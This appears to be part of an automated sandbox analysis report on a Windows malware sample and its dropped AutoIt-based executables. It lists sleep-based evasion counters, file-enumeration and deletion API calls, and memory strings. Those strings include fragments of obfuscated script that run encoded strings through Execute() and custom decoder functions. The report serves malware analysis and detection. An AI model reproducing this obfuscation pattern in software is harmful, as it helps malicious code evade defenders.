Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Window / User API: threadDelayed 3067
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7001
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2690
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2687
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6905
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2195
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1814

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	API coverage: 3.8 %
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	API coverage: 3.7 %
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	API coverage: 3.7 %

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516	Thread sleep count: 6928 > 30
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516	Thread sleep time: -6928000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516	Thread sleep count: 3067 > 30
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2516	Thread sleep time: -3067000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe TID: 2564	Thread sleep count: 160 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412	Thread sleep count: 7001 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4412	Thread sleep count: 2690 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5292	Thread sleep count: 6920 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904	Thread sleep count: 2687 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916	Thread sleep count: 6905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384	Thread sleep count: 2195 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432	Thread sleep count: 7838 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep count: 1814 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3132	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 512	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 6792	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_00409A19 ??2@YAPAXI@Z,FindFirstFileW,FindClose,	0_2_00409A19
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_004044EA FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_004044EA
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040340F FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_0040340F
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Code function: 0_2_0040352A FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_0040352A
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9E334 GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00C9E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CAA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_00CAA32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA65AE FindFirstFileW,FindNextFileW,FindClose,	7_2_00CA65AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	7_2_00CA72A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA7205 FindFirstFileW,FindClose,	7_2_00CA7205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00C9D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C9DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00C9DB0B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00CA9E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00CA9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00CA9F9E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6E334 GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00A6E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A7A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_00A7A32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A765AE FindFirstFileW,FindNextFileW,FindClose,	10_2_00A765AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A772A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	10_2_00A772A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A77205 FindFirstFileW,FindClose,	10_2_00A77205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A6D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A6DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00A6DB0B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A79E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A79E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A79F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00A79F9E
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060E334 GetFileAttributesW,FindFirstFileW,FindClose,	13_2_0060E334
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0061A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_0061A32C
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_006165AE FindFirstFileW,FindNextFileW,FindClose,	13_2_006165AE
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00617205 FindFirstFileW,FindClose,	13_2_00617205
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_006172A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	13_2_006172A6
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_0060D7CC
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_0060DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_0060DB0B
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00619E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00619E43
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00619F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00619F9E

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C329A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

7_2_00C329A4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Rifiutare.exe.com, 00000009.00000003.2080178808.00000000017A1000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2066204373.000000000176C000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2078740442.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2108145471.00000000017A4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2078343537.000000000177B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $onfUMGmxQemUHQjZU = Execute(OOAetW("92@125@123@114@119@112@82@124@79@117@120@106@125@49@48@122@118@118@97@91@114@96@106@75@86@128@125@130@48@50",9)), $QMVffPjGxd = 'RtXzUsmCVFuVFOnCruAxlqKRFUeDBGxypgZr''
Source: Rifiutare.exe.com, 00000007.00000003.1727247813.00000000019E3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1728953201.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726637724.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727869205.00000000019E4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729287097.0000000001A2A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727105640.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1745121304.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729378280.0000000001A39000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726909397.00000000019BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)\D[T5
Source: Uno.exe.com, 0000000A.00000003.1731584452.0000000003C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LQVMCIXMPTQSLOMn
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: $LqVmcIxMPtqsLO = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<80<79<114<114<118<121<106<71<126<111<117<107<91<76<45<47",6)), $xGnOWIHpkULClD = 'gsMCXDvYihOKzDTJlJhdnjEAdwnYdnOyWmSQdaIaXHdBo'
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.00000000047BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)
Source: Uno.exe.com, 0000000A.00000003.1732013022.0000000003C11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST,
Source: Uno.exe.com, 0000000A.00000003.1728146711.0000000001561000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $LqVmcIxMPtqsLO = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<80<79<114<114<118<121<106<71<126<111<117<107<91<76<45<47",6)), $xGnOWIHpkULClD = 'gsMCXDvYihOKzDTJlJhdnjEAdwnYdnOyWmSQdaIaXHdBo'-
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Local $znDtzmHMtQTFUckMy = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<122<103<84<91<79<122<122<83<45<47",6)), $JSnAAEyLS = 'pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST'
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1729353789.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727581715.0000000001510000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1726357264.000000000150B000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1707738151.000000000136E000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728909657.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727795963.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728060241.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727886798.0000000001522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $cxuhHyZUilXSovF = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<121<126<119<107<91<115<127<82<96<45<47",6)), $eqrnjYHYCAokVO = 'RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU'
Source: Uno.exe.com, 0000000A.00000003.1727581715.0000000001510000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1726357264.000000000150B000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727795963.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728415861.0000000001539000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728060241.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727886798.0000000001522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $znDtzmHMtQTFUckMy = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<122<103<84<91<79<122<122<83<45<47",6)), $JSnAAEyLS = 'pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST'QHuZr'
Source: Rifiutare.exe.com, 00000009.00000003.2078703692.0000000004626000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000002.2170535766.0000000004629000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Uno.exe.com, 0000000A.00000003.1736543737.0000000003769000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LGZWBMLBQZFNNQBQNHHOKGRLOERIQEMUSBBFCFOVTTURCEEKXP:
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.00000000047BB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727247813.00000000019E3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1728953201.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726637724.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729351877.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727869205.00000000019E4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727105640.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726909397.00000000019BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $onfUMGmxQemUHQjZU = Execute(OOAetW("92@125@123@114@119@112@82@124@79@117@120@106@125@49@48@122@118@118@97@91@114@96@106@75@86@128@125@130@48@50",9)), $QMVffPjGxd = 'RtXzUsmCVFuVFOnCruAxlqKRFUeDBGxypgZr'
Source: Uno.exe.com, 0000000A.00000003.1734150509.00000000015DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $DalkFKFhtOUfCJjww = 'ugxTLmqXroWvmcIcgEzWOpvryQvIDtACTgRaEKHLlIGvdHfnHix'
Source: Uno.exe.com, 0000000A.00000003.1729767565.00000000015CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6<109<79<121<76<114<117<103<122<46<45<121<126<119<107<91<115<127<82<96<45<47",6)), $eqrnjYHYCAokVO = 'RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU'
Source: Rifiutare.exe.com, 00000009.00000003.2119554561.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2135882118.00000000017CE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000002.2167852420.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)\Dq
Source: Uno.exe.com, 0000000A.00000003.1730853339.0000000003D3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ugxTLmqXroWvmcIcgEzWOpvryQvIDtACTgRaEKHLlIGvdHfnHixyNN
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: For $AusByNcdrBaKaXOrfBLLBAhonIOZgYrpnorXkwrqEmUzKlfZYYKakXbZSo = 10 To 36
Source: Rifiutare.exe.com, 00000007.00000003.1731289967.0000000004441000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ONFUMGMXQEMUHQJZU2
Source: Uno.exe.com, 0000000A.00000003.1731584452.0000000003C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LQVMCIXMPTQSLO
